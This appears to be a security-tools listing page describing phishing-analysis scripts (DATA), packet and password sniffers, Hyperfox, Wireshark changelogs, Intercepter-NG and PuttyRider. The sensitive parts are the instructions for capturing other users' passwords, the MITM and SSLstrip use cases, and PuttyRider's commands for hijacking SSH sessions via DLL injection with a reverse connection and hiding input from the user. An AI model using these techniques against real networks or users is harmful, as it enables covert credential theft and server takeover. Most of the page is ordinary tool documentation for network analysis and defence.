DATA - Credential Phish Analysis and Automation

Credential Phish Analysis and Automation

BUCKLEGRIPPER (py)

• Given a suspected phishing url or file of line separated urls, visit, screenshot, and scrape for interesting files.
• Requirements can be installed by running or reviewing install_bucklegripper_deps.sh

usage: bucklegripper.py [-h] [-u URL] [-s SOURCE] [-r READFILE] [-a USERAGENT]

Visit a suspected phishing page, screenshot it and pillage it for phishing
archives

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Url to visit
  -s SOURCE, --source SOURCE
                        Apply a source to where this url came from
  -r READFILE, --readfile READFILE
                        Read in a file of URLs one per line
  -a USERAGENT, --useragent USERAGENT
                        Custom User-Agent

Example of reading in a single url

$ python bucklegripper.py -s openphish -u http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html 

.: BUCKLEGRIPPER v0.1 https://github.com/hadojae/DATA/ :.

[+] Processing http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html
  [+] Screencapped http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html as 20170503-032950-openphish-www.govwebsearch.com.png
  [+] Found Zip file at http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip
  [+] Saved http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip as 20170503-032950-openphish-www.govwebsearch.com-optusnet.com.au.zip
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/
  [+] Found php file: http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/post.php
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/safe/
  [+] Saved http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip as 20170503-032951-openphish-www.govwebsearch.com-optusnet.com.au.zip
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/
[+] Found Opendir at http://www.govwebsearch.com/apc/

Example of reading in a file of line separated urls

$ python bucklegripper.py -s openphish -r ../../test_urls.txt

.: BUCKLEGRIPPER v0.1 https://github.com/hadojae/DATA/ :.

[+] Beginning processing of ../../test_urls.txt

[+] Processing http://onjasela.net/DB/fr/
  [+] Screencapped http://onjasela.net/DB/fr/ as 20170503-010034-openphish-onjasela.net.png

[+] Processing http://suesschool.com/yahoologin/yahoologin/clients/login.php
  [+] Screencapped http://suesschool.com/yahoologin/yahoologin/clients/login.php as 20170503-010053-openphish-suesschool.com.png
[+] Found Opendir at http://suesschool.com/yahoologin/yahoologin/clients/
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/login.php
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/data.php
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/block.php
[+] Found Opendir at http://suesschool.com/yahoologin/yahoologin/
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/login.php
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/data.php
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/block.php
  [+] Found Zip file at http://suesschool.com/yahoologin.zip
  [+] Saved http://suesschool.com/yahoologin.zip as 20170503-010125-openphish-suesschool.com-yahoologin.zip
[+] Found Opendir at http://suesschool.com/yahoologin/

[+] Processing http://communitypartnersjc.org/wp-admin/js/index
  [+] Screencapped http://communitypartnersjc.org/wp-admin/js/index as 20170503-010138-openphish-communitypartnersjc.org.png

[+] Processing http://ytrdesh.com/info/
  [+] Screencapped http://ytrdesh.com/info/ as 20170503-010148-openphish-ytrdesh.com.png
  
...continues...

BULLYBLINDER (py)

• While capturing a pcap visit a suspected phishing page. Handle redirectors and obfuscation to find a web form. Scrape the form and make educated guesses at what should be entered into the fields. Submit the form and repeat.
• Requirements can be installed by running or reviewing install_bullyblinder_deps.sh

usage: bullyblinder.py [-h] -u URL [-a USERAGENT] -i INTERFACE

Visit a suspected phishing page and attempt form filling while getting a pcap

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Url to visit
  -a USERAGENT, --useragent USERAGENT
                        Custom User-Agent to use
  -i INTERFACE, --interface INTERFACE
                        Interface to tell tshark to listen on

Example Usage

$ python bullyblinder.py -i eth0 -u http://www.justpropertydevelopers.com/scanned

.: BULLYBLINDER v0.1 https://github.com/hadojae/DATA/ :.

[+] Preparing pcap: 20170503-033243-www.justpropertydevelopers.com.pcap

[+] Processing http://www.justpropertydevelopers.com/scanned

[+] Submitting POST
    [+] Control: <HiddenControl(hidCflag=1)>, Control.Type: hidden, Control.Name: hidCflag, Control.ID: hidCflag
    [+] Control: <SelectControl(<None>=[])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*0])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*1])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*2])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*3])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*4])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <TextControl(Email=shannonjudith@gmail.com)>, Control.Type: email, Control.Name: Email, Control.ID: Email
    [+] Control: <PasswordControl(Passwd=696969)>, Control.Type: password, Control.Name: Passwd, Control.ID: Passwd
    [+] Control: <SubmitControl(signIn=Sign in to view attachment) (readonly)>, Control.Type: submit, Control.Name: signIn, Control.ID: signIn
    [+] Control: <CheckboxControl(PersistentCookie=[yes])>, Control.Type: checkbox, Control.Name: PersistentCookie, Control.ID: PersistentCookie
    [+] Control: <HiddenControl(rmShown=1) (readonly)>, Control.Type: hidden, Control.Name: rmShown, Control.ID: None

 [-] No form found, checking for redirectors and obfuscation. 

[+] Found js window.location or document.location, processing the redir

[+] https://drive.google.com/#my-drive appears to be a legitimate website.

[+] Complete! Submitted 1 form(s)

[+] Url Request Chain:
http://justpropertydevelopers.com/scan/docg/doc/filewords/index.php
--http://justpropertydevelopers.com/scan/docg/doc/filewords/index.php

SLICKSHOES (sh)

• A basic bash script that pulls urls out of pdfs in streams or in clear view.
• The only argument to the script is the path to a folder containing the pdfs you want to process.
• REQUIRES pdf-parser.py from https://blog.didierstevens.com/programs/pdf-tools/ location to be set in first line of script

Example Usage

$ ./slickshoes.sh ~/PDFs/
http://4cgemstones.com/polaiowpwwww/GD/index.php
http://80bpm.net/invoice-17524-Apr-26-2017-US-048591/
http://acheirapido.com.br/arquivos/pdf/
http://adams-kuwait.com/REview/office
http://rfaprojects.co.uk/invoice-80633-Apr-24-2017-US-665952/
http://sacm.net/SCANNED/ZN3747CGMSCWC/
https://geloscubinho.com.br/cgi/pdf/index.php
http://afriquecalabashsafaris.com/layouts/GD/index.php
http://akukoomole.com/AdobeLogin/index.php
...continues...

*PINCHERSOFPERIL and BULLYBUSTER are WIP
DATA scripts are a constant work in progress. Feedback, issues, and additions are welcomed.
Proper python packages will be created once suffecient testing and features have been added and more bugs have been squashed.

Troubleshooting
If you have pcap writing issues, use this to fixup dumpcap perms, observed when using some VPS

sudo chgrp YOUR_USER /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin+eip /usr/bin/dumpcap

Be sure to disable NIC features when capturing traffic run this as root. Checksum errors will cause all sorts of nightmares.

# for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth0 $i off; done

Download DATA

Read More

probeSniffer - A Tool for Sniffing Unencrypted Wireless Probe Requests from Devices

 ____  ____   ___  ____    ___ _________  ____ _____ _____  ___ ____    
|    \|    \ /   \|    \  /  _/ ___|    \|    |     |     |/  _|    \   
|  o  |  D  |     |  o  )/  [(   \_|  _  ||  ||   __|   __/  [_|  D  )  
|   _/|    /|  O  |     |    _\__  |  |  ||  ||  |_ |  |_|    _|    /   
|  |  |    \|     |  O  |   [_/  \ |  |  ||  ||   _]|   _|   [_|    \   
|  |  |  .  |     |     |     \    |  |  ||  ||  |  |  | |     |  .  \  
|__|  |__|\_|\___/|_____|_____|\___|__|__|____|__|  |__| |_____|__|\__| 
                                       v2.1 by David SchĂźtz (@xdavidhu)

A tool for sniffing unencrypted wireless probe requests from devices:

new in 2.1:

• Displaying the number of hosts
• Logging to SQLite database file
• Settable nickname for mac addresses
• Options to filter output by mac address
• Capturing 'boradcast' probe requests (without ssid)

requirements:

• Kali Linux / Raspbian with root privileges
• Python3 & PIP3 (probeSniffer will install the dependenices)
• A wireless card (capable for monitor mode) and one other internet connected interface (for vendor resolve)

options:

• -d / do not show duplicate requests
• -b / do not show broadcast requests
• -f / only show requests from the specified mac address
• --addnicks / add nicknames to mac addresses
• --flushnicks / flush nickname database
• --nosql / disable SQL logging completely
• --debug / turn debug mode on
• -h / display help menu

installing:

Kali Linux / Raspbian:

$ sudo apt-get update && sudo apt-get install python3 python3-pip -y

$ git clone https://github.com/xdavidhu/probeSniffer

$ cd probeSniffer/

$ python3 -m pip install -r requirements.txt

WARNING: probeSniffer is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

usage:
Make sure to put your interface into monitor mode before!

$ sudo python3 probeSniffer.py [monitor-mode-interface] [options]

Download probeSniffer

Read More

SmartSniff v2.16 - Capture TCP/IP packets on your network adapter

SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as sequence of conversations between clients and servers. You can view the TCP/IP conversations in Ascii mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP.) or as hex dump. (for non-text base protocols, like DNS) 

SmartSniff provides 3 methods for capturing TCP/IP packets :

1. Raw Sockets (Only for Windows 2000/XP or greater): Allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems.
2. WinPcap Capture Driver: Allows you to capture TCP/IP packets on all Windows operating systems. (Windows 98/ME/NT/2000/XP/2003/Vista) In order to use it, you have to download and install WinPcap Capture Driver from this Web site. (WinPcap is a free open-source capture driver.) 
   This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
3. Microsoft Network Monitor Driver (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
   • Option 1: Install it from the CD-ROM of Windows 2000/XP according to the instructions in Microsoft Web site
   • Option 2 (XP Only) : Download and install the Windows XP Service Pack 2 Support Tools. One of the tools in this package is netcap.exe. When you run this tool in the first time, the Network Monitor Driver will automatically be installed on your system.
4. Microsoft Network Monitor Driver 3: Microsoft provides a new version of Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic. 
   The new version of Microsoft Network Monitor (3.x) is available to download from Microsoft Web site.    

System Requirements

SmartSniff can capture TCP/IP packets on any version of Windows operating system (Windows 98/ME/NT/2000/XP/2003/2008/Vista/7/8) as long as WinPcap capture driver is installed and works properly with your network adapter. 

You can also use SmartSniff with the capture driver of Microsoft Network Monitor, if it's installed on your system.

Under Windows 2000/XP (or greater), SmartSniff also allows you to capture TCP/IP packets without installing any capture driver, by using 'Raw Sockets' method. However, this capture method has some limitations and problems:

• Outgoing UDP and ICMP packets are not captured.
• On Windows XP SP1 outgoing packets are not captured at all - Thanks to Microsoft's bug that appeared in SP1 update... 
  This bug was fixed on SP2 update, but under Vista, Microsoft returned back the outgoing packets bug of XP/SP1.
• On Windows Vista/7/8: Be aware that Raw Sockets method doesn't work properly on all systems. It's not a bug in SmartSniff, but in the API of Windows operating system. If you only see the outgoing traffic, try to turn off Windows firewall, or add smsniff.exe to the allowed programs list of Windows firewall.   

Download SmartSniff v2.16

Read More

Password Sniffer Console - Command-line Tool to Sniff and Capture HTTP/FTP/POP3/SMTP/IMAP Passwords

Password Sniffer Console is the all-in-one command-line based Password Sniffing Tool to capture Email, Web and FTP login passwords passing through the network.

It automatically detects the login packets on network for various protocols and instantly decodes the passwords.

Here is the list of supported protocols,

• HTTP (BASIC authentication)
• FTP
• POP3
• IMAP
• SMTP
  

In addition to recovering your own lost passwords, you can use this tool in following scenarios,

• Run it on Gateway System where all of your network's traffic pass through.
• In MITM Attack, run it on middle system to capture the Passwords from target system.
• On Multi-user System, run it under Administrator account to silently capture passwords for all the users.
  

It includes Installer which installs the Winpcap, network capture driver required for sniffing. For Windows 8, first you have to manually install Winpcap driver (in Windows 7 Compatibility mode) and then run our installer to install only Password Sniffer Console.

It is a very useful tool for penetration testers and being a command-line tool makes it suitable for automation.

It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Requirements

PasswordSnifferConsole requires Winpcap (http://www.winpcap.org) - industry standard packet capture library for Windows. By default latest version of Winpcap (as of this writing v4.1.2) is installed automatically during the installation of Password Sniffer Console.

However if you don't want it, you can uncheck it during installation and later install the latest version manually.

Download Password Sniffer Console

Read More

Hyperfox - HTTP and HTTPs Traffic Interceptor

Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.

Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be succesfully intercepted and recorded.

Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire formatted messages.

Download Hyperfox

Read More

SniffPass - Password Monitoring/Sniffing Software (Web/FTP/Email)

SniffPass is small password monitoring software that listens to your network, capture the passwords that pass through your network adapter, and display them on the screen instantly. SniffPass can capture the passwords of the following Protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords). 

You can use this utility to recover lost Web/FTP/Email passwords.

Using SniffPass

In order to start using SniffPass, follow the instructions below:

1. Download and install the WinPcap capture driver or the Microsoft Network Monitor driver. 
   You can also try to capture without any driver installation, simply by using the 'Raw Socket' capture method, but you should be aware that this method doesn't work properly in many systems.
2. Run the executable file of SniffPass (SniffPass.exe).
3. From the File menu, select "Start Capture", or simply click the green play button in the toolbar. If it's the first time that you use SniffPass, you'll be asked to select the capture method and the network adapter that you want to use. 
   After you select the desired capture options, SniffPass listen to your network adapter, and display instantly any password that it find.
4. In order to verify that the password sniffing works in your system, go to the demo Web page at http://www.nirsoft.net/password_test and type 'demo' as user name and 'password' as the password. After typing the user name/password and clicking 'Ok', you should see a new line in the main window of SniffPass containing the user/password you typed.

Get passwords of another computer on your network ?

Many people ask me whether SniffPass is able to get passwords from another computer on the same network. So here's the answer. In order to grab the passwords from other network computers:

1. You must use a simple hub to connect your computers to the network. All modern switches and routers automatically filter the packets of the other computers, so the computer that runs SniffPass will never "see" the passwords of other computers when you use a switch or a router.
2. Your network card must be able to enter into 'Promiscuous Mode'.
3. You must use WinPCap or Network Monitor Driver as a capture method.
4. For wireless network: Most wireless network cards (or their device drivers) automatically filter the packets of other computers, so you won't be able the capture the passwords of ther computers. However, starting from Windows Vista/7, you can capture passwords of wireless networks that are not encrypted, by using Wifi Monitor Mode and Network Monitor Driver 3.x.  
   For more information about capturing from wireless networks , read this Blog post: How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff

Command-Line Options

Command	Description
/NoCapDriver	Starts SniffPass without loading the WinPcap Capture Driver.
/NoReg	Starts SniffPass without loading/saving your settings to the Registry.

Download SniffPass

Read More

USBPcap - USB Packet capture for Windows (open-source USB Sniffer for Windows)

USBPcap is an open-source USB sniffer for Windows.

USB Packet capture for Windows Tour

Download USBPcap

Read More

PuttyRider - Hijack Putty sessions in order to sniff conversation and inject Linux commands

PuttyRider injects a DLL into a running putty.exe process in order to sniff all communication and inject Linux commands on the remote server.

This can be useful in an internal penetration test when you already have access to a sysadmin’s machine who has a Putty session open to a Linux server. You can use PuttyRider to take control of the remote server using the existing SSH session.

The tool has been recently presented at Defcamp 2014 – a security conference in Romania.

Presentation slides: *http://defcamp.ro/dc14/AdrianFurtuna.pdf*

Examples 
List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Usage

Operation modes:
    -l      List the running Putty processes and their connections
    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also
    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found
    -x      Cleanup. Remove the DLL from all running Putty instances
    -d      Debug mode. Only works with -p mode
    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and '&' character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended
    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input
    !discon     Disconnect the main Putty window so it won't display anything
                This is useful to send commands without the user to notice
    !recon      Reconnect the Putty window to its normal operation mode
    CMD         Linux shell commands
    !exit       Terminate this connection
    !help       Display help for client connection

Download PuttyRider

Read More

Wireshark v1.10.8 - The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Features

Wireshark has a rich feature set which includes the following:

• Deep inspection of hundreds of protocols, with more being added all the time
• Live capture and offline analysis
• Standard three-pane packet browser
• Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
• Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
• The most powerful display filters in the industry
• Rich VoIP analysis
• Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
• Capture files compressed with gzip can be decompressed on the fly
• Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
• Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
• Coloring rules can be applied to the packet list for quick, intuitive analysis
• Output can be exported to XML, PostScript®, CSV, or plain text 

Changelog:

The following vulnerabilities have been fixed.

• wnpa-sec-2014-07
  The frame metadissector could crash. (Bug 9999, Bug 10030)
  Versions affected: 1.10.0 to 1.10.7
  CVE-2014-4020

The following bugs have been fixed:

• VoIP flow graph crash upon opening. (Bug 9179)
• Tshark with "-F pcap" still generates a pcapng file. (Bug 9991)
• IPv6 Next Header 0x3d recognized as SHIM6. (Bug 9995)
• Failed to export pdml on large pcap. (Bug 10081)
• TCAP: set a fence on info column after calling sub dissector (Bug 10091)
• Dissector bug in JSON protocol. (Bug 10115)
• GSM RLC MAC: do not skip too many lines of the CSN_DESCR when the field is missing (Bug 10120)
• Wireshark PEEKREMOTE incorrectly decoding QoS data packets from Cisco Sniffer APs. (Bug 10139)
• IEEE 802.11: fix dissection of HT Capabilities (Bug 10166) 

Download Wireshark

Read More

WebSiteSniffer v1.41 - Captures all Web site files downloaded by your Web browser while browsing the Internet

WebSiteSniffer is a packet sniffer tool that captures all Web site files downloaded by your Web browser while browsing the Internet, and stores them on your hard drive under the base folder that you choose. WebSiteSniffer allows you to choose which type of Web site files will be captured: HTML Files, Text Files, XML Files, CSS Files, Video/Audio Files, Images, Scripts, and Flash (.swf) files.

While capturing the Web site files, the main window of WebSiteSniffer displays general statistics about the downloaded files for every Web site / host name, including the total size of all files (compressed and uncompressed) and total number of files for every file type (HTML, Text, Images, and so on)

Download WebSiteSniffer v1.41

Read More

WebCookiesSniffer - Capture Web site cookies

WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

Download WebCookiesSniffer

Read More

HTTPNetworkSniffer - Http Sniffer Utility

HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and then export them to text/html/xml/csv file or copy them to the clipboard and then paste them into Excel.

Download HTTPNetworkSniffer

Read More

Wireshark v1.11.3 - The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.11.3

New and Updated Features

The following features are new (or have been significantly updated) since version 1.11.1:

• Qt port:
  • The About dialog has been added
  • The Capture Interfaces dialog has been added.
  • The Decode As dialog has been added. It managed to swallow up the User Specified Decodes dialog as well.
  • The Export PDU dialog has been added.
  • Several SCTP dialogs have been added.
  • The statistics tree (the backend for many Statistics and Telephony menu items) dialog has been added.
  • The I/O Graph dialog has been added.
  • French translation has updated.

The following features are new (or have been significantly updated) since version 1.11.1:

• Mac OS X packaging has been improved.

The following features are new (or have been significantly updated) since version 1.11.0:

• Dissector output may be encoded as UTF-8. This includes TShark output.
• Qt port:
  • The Follow Stream dialog now supports packet and TCP stream selection.
  • A Flow Graph (sequence diagram) dialog has been added.
  • The main window now respects geometry preferences.

The following features are new (or have been significantly updated) since version 1.10:

• Wireshark now uses the Qt application framework. The new UI should provide a significantly better user experience, particularly on Mac OS X and Windows.
• The Windows installer now uninstalls the previous version of Wireshark silently. You can still run the uninstaller manually beforehand if you wish to run it interactively.
• Expert information is now filterable when the new API is in use.
• The “Number” column shows related packets and protocol conversation spans (Qt only).
• When manipulating packets with editcap using the -C <choplen> and/or -s <snaplen> options, it is now possible to also adjust the original frame length using the -L option.
• You can now pass the -C <choplen> option to editcap multiple times, which allows you to chop bytes from the beginning of a packet as well as at the end of a packet in a single step.
• You can now specify an optional offset to the -C option for editcap, which allows you to start chopping from that offset instead of from the absolute packet beginning or end.
• “malformed” display filter has been renamed to “_ws.malformed”. A handful of other filters have been given the “_ws.” prefix to note they are Wireshark application specific filters and not dissector filters.

Download Wireshark v1.11.3

Read More

DNSQuerySniffer - DNS Queries Sniffer

DNSQuerySniffer is a network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: Host Name, Port Number, Query ID, Request Type (A, AAAA, NS, MX, and so on), Request Time, Response Time, Duration, Response Code, Number of records, and the content of the returned DNS records. 

You can easily export the DNS queries information to csv/tab-delimited/xml/html file, or copy the DNS queries to the clipboard, and then paste them into Excel or other spreadsheet application.

Download DNSQuerySniffer

Read More

[tcpxtract] Tool for Extracting Files from Network Traffic

tcpxtract is a tool for extracting files from network traffic based on file signatures. Extracting files based on file type headers and footers (sometimes called "carving") is an age old data recovery technique. Tools like Foremost employ this technique to recover files from arbitrary data streams. Tcpxtract uses this technique specifically for the application of intercepting files transmitted across a network. Other tools that fill a similar need are driftnet and EtherPEG. driftnet and EtherPEG are tools for monitoring and extracting graphic files on a network and is commonly used by network administrators to police the internet activity of their users. The major limitations of driftnet and EtherPEG is that they only support three filetypes with no easy way of adding more. The search technique they use is also not scalable and does not search across packet boundries. tcpxtract features the following:

Supports 26 popular file formats out-of-the-box. New formats can be added by simply editing its config file.

• With a quick conversion, you can use your old Foremost config file with tcpxtract.
• Custom written search algorithm is lightning fast and very scalable.
• Search algorithm searches across packet boundries for total coverage and forensic quality.
• Uses libpcap, a popular, portable and stable library for network data capture.
• Can be used against a live network or a tcpdump formatted capture file.

Download tcpxtract

Read More

[Intercepter-ng] Sniffer de Red con SSLstrip para Android

Intercepter-NG es una aplicación que nos permitirá capturas el tráfico de datos en la red local a la que estemos conectados. Esta herramienta tiene la funcionalidad de analizador de protocolos al más puro estilo Wireshark aunque con muchísimas menos opciones. Con Intercepter-ng podremos ver cookies de las diferentes conexiones que se realicen así como realizar ataques contra SSL con SSLStrip.

En RedesZone tenéis un completo manual de utilización de SSLstrip y cómo funciona exactamente para “descifrar” el tráfico SSL. La aplicación tiene varias pestañas para elegir el objetivo, iniciar el analizador de paquetes y ver todo el tráfico en detalle y también las cookies de las páginas web que la víctima ha visitado.

Lo primero que debemos hacer con esta aplicación es pulsar en el radar para escanear los posibles objetivos, una vez seleccionado el objetivo nos movemos por las pestañas para ir viendo las diferentes opciones que nos brinda esta aplicación.

Alguna de las utilidades es que nos permite recuperar la contraseña y los archivos que se transmitan en la red que estamos analizando.

Los requisitos que necesita esta aplicación son los siguientes:

• Android 2.3.3 o superior
• Ser root
• Tener instalado Busybox

Fuente

Download Intercepter-ng

Read More

[Wireshark v1.10.0 RC2] The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.10.0 RC 2

Wireshark 1.10.0rc2 has been released. Installers for Windows, OS X, and source code are now available. This is the first release candidate for Wireshark 1.10.0.

New and Updated Features

The following features are new (or have been significantly updated) since version 1.8:

• Wireshark on 32- and 64-bit Windows supports automatic updates.
• The packet bytes view is faster.
• You can now display a list of resolved host names in “hosts” format within Wireshark.
• The wireless toolbar has been updated.
• Wireshark on Linux does a better job of detecting interface addition and removal.
• It is now possible to compare two fields in a display filter (for example: udp.srcport != udp.dstport). The two fields must be of the same type for this to work.
• The Windows installers ship with WinPcap 4.1.3, which supports Windows 8.
• USB type and product name support has been improved.
• All Bluetooth profiles and protocols are now supported.
• Wireshark now calculates HTTP response times and presents the result in a new field in the HTTP response. Links from the request’s frame to the response’s frame and vice-versa are also added.
• The main welcome screen and status bar now display file sizes using strict SI prefixes instead of old-style binary prefixes.
• Capinfos now prints human-readable statistics with SI suffixes by default.
• It is now possible to open a referenced packet (such as the matched request or response packet) in a new window.
• Tshark can now display only the hex/ascii packet data without requiring that the packet summary and/or packet details are also displayed. If you want the old behavior, use -Px instead of just -x.
• Wireshark can be compiled using GTK+ 3.
• The Wireshark application icon, capture toolbar icons, and other icons have been updated.
• Tshark’s filtering and multi-pass analysis have been reworked for consistency and in order to support dependent frame calculations during reassembly. See the man page descriptions for -2, -R, and -Y.
• Tshark’s -G fields2 and -G fields3 options have been eliminated. The -G fields option now includes the 2 extra fields that -G fields3 previously provided, and the blurb information has been relegated to the last column since in many cases it is blank anyway.
• Wireshark dropped the left-handed settings from the preferences. This is still configurable via the GTK settings (add “gtk-scrolled-window-placement = top-right” in the config file, which might be called /.gtkrc-2.0 or /.config/gtk-3.0/settings.ini).
• Wireshark now ships with two global configuration files: Bluetooth, which contains coloring rules for Bluetooth and Classic, which contains the old-style coloring rules.

Full changelog: here

Download Wireshark v1.10.0 RC2

Read More

[Wireshark v1.8.7] The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.8.7

What’s New

Bug Fixes

The following vulnerabilities have been fixed.

• wnpa-sec-2013-23The RELOAD dissector could go into an infinite loop. Discovered by Evan Jensen. (Bug 8364, (Bug 8546) Versions affected: 1.8.0 to 1.8.6.
  CVE-2013-2486
  CVE-2013-2487
• wnpa-sec-2013-24The GTPv2 dissector could crash. (Bug 8493) Versions affected: 1.8.0 to 1.8.6.
• wnpa-sec-2013-25The ASN.1 BER dissector could crash. (Bug 8599) Versions affected: 1.8.0 to 1.8.6, 1.6.0 to 1.6.14.
• wnpa-sec-2013-26The PPP CCP dissector could crash. (Bug 8638) Versions affected: 1.8.0 to 1.8.6.
• wnpa-sec-2013-27The DCP ETSI dissector could crash. Discovered by Evan Jensen. (Bug 8231, bug 8540, bug 8541) Versions affected: 1.8.0 to 1.8.6.
• wnpa-sec-2013-28The MPEG DSM-CC dissector could crash. (Bug 8481) Versions affected: 1.8.0 to 1.8.6.
• wnpa-sec-2013-29The Websocket dissector could crash. Discovered by Moshe Kaplan. (Bug 8448, Bug 8499) Versions affected: 1.8.0 to 1.8.6.
• wnpa-sec-2013-30The MySQL dissector could go into an infinite loop. Discovered by Moshe Kaplan. (Bug 8458) Versions affected: 1.8.0 to 1.8.6.
• wnpa-sec-2013-31The ETCH dissector could go into a large loop. Discovered by Moshe Kaplan. (Bug 8464) Versions affected: 1.8.0 to 1.8.6.

The following bugs have been fixed:

• The Windows installer and uninstaller does a better job of detecting running executables.
• Library mismatch when compiling on a system with an older Wireshark version. (Bug 6011)
• SNMP dissector bug: STATUS_INTEGER_DIVIDE_BY_ZERO. (Bug 7359)
• A console window is never opened. (Bug 7755)
• GSM_MAP show malformed Packets when two IMSI. (Bug 7882)
• Fix include and libs search path when cross compiling. (Bug 7926)
• PER dissector crash. (Bug 8197)
• pcap-ng: name resolution block is not written to file on save. (Bug 8317)
